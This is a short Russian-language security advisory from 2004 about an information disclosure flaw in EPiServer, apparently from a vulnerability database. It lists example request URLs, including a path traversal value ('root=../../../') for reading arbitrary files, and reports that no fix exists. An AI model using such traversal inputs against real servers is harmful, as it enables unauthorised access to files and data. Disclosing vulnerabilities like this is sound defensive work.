Раскрытие информации в EPiServer

Дата публикации:
26.10.2004
Всего просмотров:
1067
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: EPiServer

Описание:
Обнаружен уязвимость в EPiServer. Удаленный атакующий может просмотреть произвольные файлы на уязвимой системе, получить доступ к важной информации, вызвать отказ в обслуживании приложения. Примеры:

http://[target]/templates/Page.asp x?id=20691
http://[target]/news.asp?id=7661
http://[target]/system/linkurl.asp?root=../../../
http://[target]/templates/CommonPage____19461.asp

URL производителя: www.episerver.com

Решение: Решение не существует на данный момент.

Ссылки: EPiServer Input Validation Errors May Disclose Information to Remote Users

или введите имя

CAPTCHA